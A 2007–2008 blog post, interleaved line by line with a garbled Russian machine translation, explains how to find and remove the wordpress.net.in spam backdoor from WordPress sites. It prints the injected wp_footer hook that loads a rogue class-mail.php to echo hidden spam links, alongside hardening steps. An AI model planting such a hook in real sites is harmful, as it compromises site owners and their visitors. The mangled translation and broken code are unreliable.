How to Remove Wordpress.net.in Spam Injection How to Remove Wordpress.net.in Spam Injection Как удалить спам Wordpress.net.in инъекций Как удалить спам Wordpress.net.in инъекций

I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’sa backdoor (wordpress.net.in). Я счел это время просмотра WordPress форум поддержки, некоторые из этих жертв обновить свои default_filters.php и загружать класс-mail.php внутри их WordPress, не зная, что это черный ход (wordpress.net.in). There is no class-mail.php in WordPress except class-phpmailer.php . Существует не класс-mail.php в WordPress, за исключением класса phpmailer.php. So don’t get confuse by it. Так что не получают ее в заблуждение.

Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes. Ниже приведен быстрый обход о том, каким образом вы можете удалить нарушителя Горо spamware раствор для инъекций, прежде чем Google запретил вам из интернета труб.

Workaround Обход

• For temporary disable remote include in php.ini settings. Для временного отключения удаленного включить в php.ini настройки.

   ;;;;;;;;;;;;;;;;;; ; Fopen wrappers ; ;;;;;;;;;;;;;;;;;;  ; Whether to allow the treatment of URLs (like http:// or ftp://) as files. ;;;;;;;;;;;;;;;;;;; Обертки и fopen; ;;;;;;;;;;;;;;;;;;; ли разрешить обращение с URL-адресов (например, http:// и ftp://) в виде файлов. allow_url_fopen = off allow_url_include = off allow_url_fopen = = allow_url_include покинуть покинуть 

• Check your .htaccess for suspicious redirect. Проверьте ваш. Htaccess подозрительное переадресации.
• Find class-mail.php inside “*/wp-includes/” directory and removed it. Найти класс-mail.php внутри "* / wp-включает /" директорию и удалить его.
• Find the following code inside “*/wp-includes/default_filters.php” and removed it Найдите следующий код внутри "* / wp-includes/default_filters.php" и удалили его

   add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775'); function wpc7c16<>b8466d864eeefd20050625c7775() { @include(’./wp-includes/class-mail.php’); if(sizeof($wparr)>0){ echo “!div id=\”goro\”!”; foreach($wparr as $k=>$v){ echo ““.ucwords($v[’key’]).”\n”; if($i  ==$inum) break; } echo “!/div!”.$_footer; } } add_action ( 'wp_footer', 'wpc7c16b8466d864eeefd20050625c7775'); функция wpc7c16 <> b8466d864eeefd20050625c7775 () (@ включать ( '. / wp-включает / класс-mail.php'); если (sizeof ($ wparr)> 0) (эхо " ! div идентификатор = \ "Горо \"! "; foreach ($ wparr как к $ => $ в) (эхо" ". ucwords ($ в [ 'ключ'])." \ n"; если (я $     = = $ inum) перерыва;) эхо "! / div !".$_ колонтитул;)) 

• Robots.txt Exclusion Исключение Robots.txt

  Optional - Prevent googlebot from indexing the static spam page. Необязательно - Запрет на google-бот индексировать спам статические страницы.
  Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”. Войти на Wordpress администратора> Управление> Files> Другие файлы → введите "Robots.txt". Add the following code. Добавьте следующий код.

   User-agent: Googlebot Disallow: /*?* Disallow: /*? User-Агент: робот Google Disallow: / * *? Disallow: / *? 

  Refer robots.txt . Обратитесь robots.txt.

Possible WordPress class (suspicious) files that would be tempered Возможные WordPress класса (подозрительных) файлов, которые будут закаленное

Md5 checksum the following files, compare it with official versions from WordPress Release Archive . Контрольная сумма MD5 следующие файлы, сравните ее с официальной версии из WordPress-релиз Архив.

• wp-db.php wp-db.php
• gettext.php gettext.php

The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities. Выше методов только удалять и инвалидов спамов связей, нет никакой гарантии, что он будет защищен от вас будущих уязвимости. Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade . Резервное копирование (или экспортировать эту должность с использованием WordPress Расширенная RSS-WRX) и выполнять полное обновление.

Dec 13, 2007 13 декабря 2007 года

I just notice this recently. Я просто заметить это в последнее время. You’ll need to check your site HTTP Header. Вам нужно будет проверить ваш сайт HTTP-заголовка. Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500) . Большинство угнанных сайты не ответ с правильной статуса HTTP Header (400 <> 500). My guess is they did this to cloak from being crawl by search engine spiders. Моя догадаться, что они делали это для прикрытия от сканирование, "паукам" поисковых систем. If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner . Если вы были очищены все зараженные файлы и заголовок не правильно получить ответ rookit сканер.

Check your website status header, try cloak your browser (UA) as Search Engine Crawler. Проверьте свой веб-сайт статуса заголовка, попробуйте плащ браузера (UA), как поисковая система сканера. The following screenshot will show you how to setup this at web-sniffer.net. Следующий скриншот покажу вам, как настроить на этом веб-sniffer.net.

This methods may not work if the cloaking scripts used IP base tracking. Данный метод может не сработать, если используются скрипты клоакинг IP база слежения. So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver). Так что попробовать на разные строки агента пользователя (например: inoktomi, askjeeves, ia_archiver).

Firefox Browser Браузер Firefox

You can also override your useragent string with firefox ↓. Вы можете также отменит ваши UserAgent эти строки, firefox ↓.

about:config → general.useragent.overide = ‘ ua strings ‘ о: конфигурации → general.useragent.overide = 'укр строки "

Wordpress.net.in Backdoor Wordpress.net.in Backdoor

Extra info Дополнительная информация

Dec 14, 2007 14 декабря 2007 года

I did some research at archive.org . Я сделал некоторые исследования на archive.org. It seem our wordpress.net.in Seo Spam has been going on since 2005. Он, похоже наши wordpress.net.in Сео спама продолжается уже с 2005 года. The first variant used file_get_contents() PHP functions to retrieve their sources code (A UTF MAP Decoder 1974 Php Class ). Первый вариант используется file_get_contents () PHP функций для получения их источников код (UTF КАРТА Decoder 1974 Php класс).

I also found a signature name alxumuk (at MIT & wordpress.net.in). Я также установлено имя alxumuk подписи (в Массачусетском технологическом институте и wordpress.net.in). His first historic test can be root back at *.media.mit.edu/~? server (I hide the userid as it may be “false positive”). Его первое историческое испытание может быть корень обратно в *. media.mit.edu / ~? Сервер (Я скрываюсь userid, как он может быть "ложные положительные"). After my first search on google for alxumuk all the results has been scraped out by Google & “Google alert” so there is no references to this query in Google Index. После моего первого поиска google по alxumuk все результаты были из Царапины на Google и "Google боевой готовности", поэтому нет ссылки на этот запрос в индексе Google.

My query for file_get_contents include require allintext:1974.* (the UTF decode package) and the signature (alxumuk) will return 403 Forbidden . Мой запрос для file_get_contents включать требуют allintext: 1974 .* (UTF декодирования пакетов) и подпись (alxumuk) вернет 403 Запрещено.

As Google Advanced Search blocked “the query” this may confirm that 1974.* (UTF decode) is probably the package for reading the bootstrap for wordpress.net.in backdoor (similar case like perl.santy net worm). Как и Google Расширенный поиск заблокирован "запрос" это может подтвердить, что 1974 .* (UTF декодировать) является, вероятно, пакет для чтения для загрузки wordpress.net.in черный ход (аналогичное дело, как червь perl.santy нетто).

If this is a true Net Worm, I suggest anyone with older versions of Wordpress should removed\ the meta generator tag (Wordpress versions) and disabled XML-RPC(& RSD) for hardening wordpress from remote vectors vulnerabilities. Если это верно Net Worm, я предлагаю, кто с более старыми версиями Wordpress следует удалить \ генератор мета-тегов (Wordpress версии) и инвалидам XML-RPC (и RSD) для упрочнения wordpress из отдаленных векторов уязвимости.

Wordpress.net.in Doorway Дверная Wordpress.net.in

Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/ 24 декабря 2007 → http://www.wordpress.net.in/mentors/alxumuk/

Backdoor Files Backdoor Файлы

inside wp-includes directory. внутри wp-включает в себя каталог.

• compat.php - (replace with latest version) compat.php - (заменить поздняя версия)
• class-mail.php delete класс-mail.php удалить

scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins . сканирование и удаляет все файлы бэкдор и создавать. htaccess файл в wp-включает в себя и wp-content/plugins. Then add the following code to disabled directory listing (prevent informations leak & Directory search index). Затем добавить следующий код для инвалидов листинг каталога (предотвращение утечки информации и поиска в каталоге индекса).

 Options -Indexes Опции индексов 

Wordpress.net.in New Partner Wordpress.net.in нового партнера

Feb 23th 2008 , We found a similar signature like wordpress.net.in at qwetro.com (germany). 23 февраля 2008 года, мы обнаружили, как и аналогичные подписи wordpress.net.in на qwetro.com (Германия). Probably from the same attacker with different agenda. Наверное, с того же атакующего с разными дня.

Related Posts Похожие Сообщений

• Bluehost HostMonster CEO’s Blog hacked (wordpress.net.in) Bluehost HostMonster CEO's Blog взломанный (wordpress.net.in)
• Matt Heaton Bluehost Hostmonster CEO’s Hacked Again - Strike II Мэтт Heaton Bluehost Hostmonster CEO's Hacked снова - Strike II

External Links Внешние ссылки

• Websniffer View HTTP Request and Response Header Websniffer просмотра HTTP-запрос и ответ Header
• Wordpress Support Forum Wordpress форум поддержки
• National Vulnerability Database Wordpress 2.0 > 2.0.6 База данных Национального уязвимости Wordpress 2,0> 2.0.6

Short URL Краткий URL

Bookmarks Закладки

• Share This Доля этого